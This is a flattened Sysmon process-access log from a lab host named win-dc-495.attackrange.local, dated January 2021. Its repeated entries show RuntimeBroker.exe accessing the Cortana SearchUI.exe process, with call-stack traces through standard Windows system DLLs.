13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 